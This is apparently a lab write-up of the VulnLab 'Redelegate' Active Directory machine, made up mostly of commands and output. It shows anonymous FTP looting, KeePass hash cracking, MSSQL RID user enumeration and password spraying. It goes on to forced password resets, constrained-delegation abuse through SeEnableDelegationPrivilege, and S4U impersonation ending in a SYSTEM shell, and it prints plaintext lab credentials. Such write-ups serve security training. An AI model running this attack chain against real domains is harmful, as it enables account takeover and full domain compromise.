VulnLab Redelegate
VulnLab Redelegate
VulnLab Redelegate
Redelegate
Recon
1
2
└─$ rustscan -g -a 10.10.112.26 -r 1-65535
10.10.112.26 -> [21,53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5357,5985,3389,9389,47001,49664,49665,49666,49667,49672,49668,49675,49676,49932,53564,56281,56293,56295]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
└─$ nmap -sC -sV -p21,53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5357,5985,3389,9389,47001,49664,49665,49666,49667,49672,49668,49675,49676,49932,53564,56281,56293,56295 10.10.112.26
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 18:51 +05
Nmap scan report for 10.10.112.26
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 12:11AM 434 CyberAudit.txt
| 10-20-24 04:14AM 2622 Shared.kdbx
|_10-20-24 12:26AM 580 TrainingAgenda.txt
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-30 13:50:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.112.26:1433:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
|_ Product_Version: 10.0.20348
|_ssl-date: 2024-12-30T13:51:53+00:00; -1m19s from scanner time.
| ms-sql-info:
| 10.10.112.26:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-30T13:41:13
|_Not valid after: 2054-12-30T13:41:13
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-12-30T13:51:52+00:00; -1m20s from scanner time.
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-30T13:51:41+00:00
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2024-10-30T13:31:09
|_Not valid after: 2025-05-01T13:31:09
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49932/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.112.26:49932:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-30T13:41:13
|_Not valid after: 2054-12-30T13:41:13
| ms-sql-info:
| 10.10.112.26:49932:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 49932
|_ssl-date: 2024-12-30T13:51:52+00:00; -1m20s from scanner time.
53564/tcp open msrpc Microsoft Windows RPC
56281/tcp open msrpc Microsoft Windows RPC
56293/tcp open msrpc Microsoft Windows RPC
56295/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-30T13:51:45
|_ start_date: N/A
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.08 seconds
User
We can’t perform anonymous bind/authentication to LDAP/SMB. But we see FTP port, which is odd on Domain Controller. Let’s check it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ ftp anonymous@10.10.112.26
Connected to 10.10.112.26.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||60209|)
125 Data connection already open; Transfer starting.
10-20-24 12:11AM 434 CyberAudit.txt
10-20-24 04:14AM 2622 Shared.kdbx
10-20-24 12:26AM 580 TrainingAgenda.txt
226 Transfer complete.
ftp>
We see kdbx file which could contain something interesting, so let’s download all files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ftp> binary
200 Type set to I.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: CyberAudit.txt remote: CyberAudit.txt
229 Entering Extended Passive Mode (|||60225|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 434 4.73 KiB/s 00:00 ETA
226 Transfer complete.
434 bytes received in 00:00 (4.71 KiB/s)
local: Shared.kdbx remote: Shared.kdbx
229 Entering Extended Passive Mode (|||60226|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 2622 28.42 KiB/s 00:00 ETA
226 Transfer complete.
2622 bytes received in 00:00 (28.31 KiB/s)
local: TrainingAgenda.txt remote: TrainingAgenda.txt
229 Entering Extended Passive Mode (|||60227|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 580 6.32 KiB/s 00:00 ETA
226 Transfer complete.
580 bytes received in 00:00 (6.26 KiB/s)
ftp> exit
221 Goodbye.
The interesting note regarding passwords
1
2
3
4
5
6
7
8
└─$ cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
<SNIP>
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
<SNIP>
Could be a hint for a password to keepass database, let’s generate password list
1
2
3
4
5
Spring2024!
Summer2024!
Autumn2024!
Winter2024!
<REDACTED>
Let’s crack it using
1
└─$ keepass2john ftp/Shared.kdbx > keepass_hash
1
2
└─$ cat keepass_hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
1
2
3
4
5
6
7
8
9
10
11
12
└─$ john keepass_hash -w=passwords.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (Shared)
1g 0:00:00:00 DONE (2024-12-30 19:08) 3.333g/s 16.66p/s 16.66c/s 16.66C/s Spring2024!..<REDACTED>
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We cracked the hash and found credentials inside database file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ kpcli
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> open ftp/Shared.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Shared/
kpcli:/> cd Shared
kpcli:/Shared> ls
=== Groups ===
Finance/
HelpDesk/
IT/
<SNIP>
kpcli:/Shared/IT> show -f 2
Title: SQL Guest Access
Uname: SQLGuest
Pass: <REDACTED>
URL:
Notes:
We can also use keepassxc-cli
1
2
3
4
5
6
7
8
9
10
11
└─$ keepassxc-cli export ftp/Shared.kdbx --format csv
Enter password to unlock ftp/Shared.kdbx:
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"Shared/IT","FTP","FTPUser","SguPZBKdRyxWzvXRWy6U","","Deprecated","","0","2024-10-20T07:56:58Z","2024-10-20T07:56:20Z"
"Shared/IT","FS01 Admin","Administrator","Spdv41gg4BlBgSYIW1gF","","","","0","2024-10-20T07:57:21Z","2024-10-20T07:57:02Z"
"Shared/IT","WEB01","WordPress Panel","cn4KOEgsHqvKXPjEnSD9","","","","0","2024-10-20T08:00:25Z","2024-10-20T07:57:24Z"
"Shared/IT","SQL Guest Access","SQLGuest","<REDACTED>","","","","0","2024-10-20T08:27:09Z","2024-10-20T08:26:48Z"
"Shared/HelpDesk","KeyFob Combination","","22331144","","","","0","2024-10-20T12:12:32Z","2024-10-20T12:12:09Z"
"Shared/Finance","Timesheet Manager","Timesheet","hMFS4I0Kj8Rcd62vqi5X","","","","0","2024-10-20T12:14:18Z","2024-10-20T12:13:30Z"
"Shared/Finance","Payrol App","Payroll","cVkqz4bCM7kJRSNlgx2G","","","","0","2024-10-20T12:14:11Z","2024-10-20T12:13:50Z"
We saw mssql running during scan. The creds for sqlguest work
1
2
3
4
5
6
7
8
9
10
11
12
└─$ mssqlclient.py SQLGuest:'<REDACTED>'@10.10.112.26
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SQLGuest guest@master)>
xp_dirtree works, but we can’t crack the hash for sql_svc. There is another way to enumerate domain described in this blog.
1
2
3
4
SQL (SQLGuest guest@master)> SELECT DEFAULT_DOMAIN();
----------
REDELEGATE
We can retrieve the RID of the Domain Admins, since it also contains the SID of the domain (first 48 bytes), we can use it to enumerate users.
1
2
3
4
5
6
SQL (SQLGuest guest@master)> SELECT SUSER_SID('REDELEGATE\Domain Admins')
-----------------------------------------------------------
b'010500000000000515000000a185deefb22433798d8e847a00020000'
SQL (SQLGuest guest@master)>
We can use this python script to convert it to SID
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def hex_to_sid(hex_string):
# Split the hex string into bytes
hex_bytes = bytes.fromhex(hex_string)
# Extract the SID components
revision = hex_bytes[0]
sub_authority_count = hex_bytes[1]
identifier_authority = hex_bytes[2:8]
sub_authorities = hex_bytes[8:]
# Convert identifier authority to its decimal form
identifier_authority_dec = int.from_bytes(identifier_authority, 'big')
# Generate the SID string
sid = f"S-{revision}-{identifier_authority_dec}"
for i in range(sub_authority_count):
sub_auth = int.from_bytes(sub_authorities[i * 4: (i + 1) * 4], 'little')
sid += f"-{sub_auth}"
return sid
# Example hex string from SQL Server
hex_string = "010500000000000515000000a185deefb22433798d8e847a00020000"
sid = hex_to_sid(hex_string)
print("SID:", sid)
Since we now domain SID, we can use enumerate the users. But to do that we have create a script. We can use the following query: SELECT SUSER_SNAME(SID_BINARY(N'<DOMAIN_SID>-<RID>')) to query users
1
└─$ for SID in {500..1200}; do (echo "SELECT SUSER_SNAME(SID_BINARY(N'S-1-5-21-4024337825-2033394866-2055507597-$SID'))" >> queries.txt); done
After generating the list of queries, we can now input it to mssqlclient.py
1
└─$ mssqlclient.py SQLGuest:'<REDACTED>'@10.10.112.26 -f queries.txt >> user-enumeration.txt
Now we have users and groups list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
└─$ cat user-enumeration.txt | grep -a 'REDELEGATE'
REDELEGATE\Guest
REDELEGATE\krbtgt
REDELEGATE\Domain Admins
REDELEGATE\Domain Users
REDELEGATE\Domain Guests
REDELEGATE\Domain Computers
REDELEGATE\Domain Controllers
REDELEGATE\Cert Publishers
REDELEGATE\Schema Admins
REDELEGATE\Enterprise Admins
REDELEGATE\Group Policy Creator Owners
REDELEGATE\Read-only Domain Controllers
REDELEGATE\Cloneable Domain Controllers
REDELEGATE\Protected Users
REDELEGATE\Key Admins
REDELEGATE\Enterprise Key Admins
REDELEGATE\RAS and IAS Servers
REDELEGATE\Allowed RODC Password Replication Group
REDELEGATE\Denied RODC Password Replication Group
REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
REDELEGATE\DC$
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
REDELEGATE\Helen.Frost
REDELEGATE\Michael.Pontiac
REDELEGATE\Mallory.Roberts
REDELEGATE\James.Dinkleberg
REDELEGATE\Helpdesk
REDELEGATE\IT
REDELEGATE\Finance
REDELEGATE\DnsAdmins
REDELEGATE\DnsUpdateProxy
REDELEGATE\Ryan.Cooper
REDELEGATE\sql_svc
Users
1
2
3
4
5
6
7
8
9
└─$ cat users.txt
Ryan.Cooper
sql_svc
Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
We can try password spraying using password scheme that was mentioned in the note
1
2
3
4
5
6
└─$ nxc smb 10.10.112.26 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.112.26 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.26 445 DC [-] redelegate.vl\Ryan.Cooper:Spring2024! STATUS_LOGON_FAILURE
<SNIP>
SMB 10.10.112.26 445 DC [+] redelegate.vl\Marie.Curie:<REDACTED>
<SNIP>
Since we have valid creds, let’s enumerate domain using bloodhound
1
2
3
└─$ bloodhound-python -d 'redelegate.vl' -u 'Marie.Curie' -p '<REDACTED>' -c all -ns 10.10.112.26 --zip
INFO: Found AD domain: redelegate.vl
<SNIP>
We have interesting path from Marie.Curie to Helen.Frost who can PSRemote to DC
Let’s change Helen’s password
1
2
3
4
5
6
7
8
└─$ changepasswd.py redelegate/helen.frost@10.10.112.26 -newpass 'P@ssw0rd!' -altuser redelegate/marie.curie -reset -altpass '<REDACTED>' -dc-ip 10.10.112.26
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of redelegate\helen.frost as redelegate\marie.curie
[*] Connecting to DCE/RPC as redelegate\marie.curie
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
1
2
3
└─$ nxc smb 10.10.112.26 -u 'Helen.Frost' -p 'P@ssw0rd!'
SMB 10.10.112.26 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.112.26 445 DC [+] redelegate.vl\Helen.Frost:P@ssw0rd!
And now we can use evil-winrm
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u helen.frost -p 'P@ssw0rd!' -i 10.10.112.26
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents>
Root
We see that we have SeEnableDelegationPrivilege, which means that we can enable delegations in the domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
redelegate\helen.frost S-1-5-21-4024337825-2033394866-2055507597-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
REDELEGATE\IT Group S-1-5-21-4024337825-2033394866-2055507597-1113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We know that Helen has GenericAll rights over FS01, which can be used for the attack. We will be using Constrained Delegation. Unconstrained Delegation will require us to create a DNS entry and ability to add computers (The MachineAccountQuota is 0 in this case). Let’s first change FS01’s password
1
2
3
4
5
6
7
8
└─$ changepasswd.py redelegate/'fs01$'@10.10.112.26 -newpass 'P@ssw0rd!' -altuser redelegate/helen.frost -reset -altpass 'P@ssw0rd!' -dc-ip 10.10.112.26
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of redelegate\fs01$ as redelegate\helen.frost
[*] Connecting to DCE/RPC as redelegate\helen.frost
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Now we have to set SPN using Powershell/Powerview
1
2
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="cifs/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
or from linux
1
2
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'helen.frost' -d 'redelegate.vl' -p 'P@ssw0rd!' --host 'dc.redelegate.vl' set object 'fs01$' 'msDS-AllowedToDelegateTo' -v 'cifs/dc.redelegate.vl'
[+] fs01$'s msDS-AllowedToDelegateTo has been updated
1
2
3
4
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'helen.frost' -d 'redelegate.vl' -p 'P@ssw0rd!' --host 'dc.redelegate.vl' get object 'fs01$' --attr 'msDS-AllowedToDelegateTo'
distinguishedName: CN=FS01,CN=Computers,DC=redelegate,DC=vl
msDS-AllowedToDelegateTo: cifs/dc.redelegate.vl
1
2
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'helen.frost' -d 'redelegate.vl' -p 'P@ssw0rd!' --host 'dc.redelegate.vl' add uac 'fs01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to fs01$'s userAccountControl
1
2
3
4
5
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'helen.frost' -d 'redelegate.vl' -p 'P@ssw0rd!' --host 'dc.redelegate.vl' get object 'fs01$' --attr userAccountControl
distinguishedName: CN=FS01,CN=Computers,DC=redelegate,DC=vl
userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_TO_AUTH_FOR_DELEGATION
Now, we can perform delegation (Note that, Administrator cannot be delegated)
But we can impersonate Ryan.Cooper who is Domain Admin. Let’s craft TGS
1
2
3
4
5
6
7
8
9
└─$ getST.py -spn cifs/dc.redelegate.vl 'redelegate.vl/fs01$':'P@ssw0rd!' -impersonate ryan.cooper
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating ryan.cooper
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in ryan.cooper@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache
Use ticket to psexec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
└─$ KRB5CCNAME=ryan.cooper@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache psexec.py -k -no-pass dc.redelegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.redelegate.vl.....
[*] Found writable share ADMIN$
[*] Uploading file owaGlDso.exe
[*] Opening SVCManager on dc.redelegate.vl.....
[*] Creating service Eugv on dc.redelegate.vl.....
[*] Starting service Eugv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
https://api.vulnlab.com/api/v1/share?id=c4bfad12-e23d-43bd-b12f-6e2465d11242
This post is licensed under CC BY 4.0 by the author.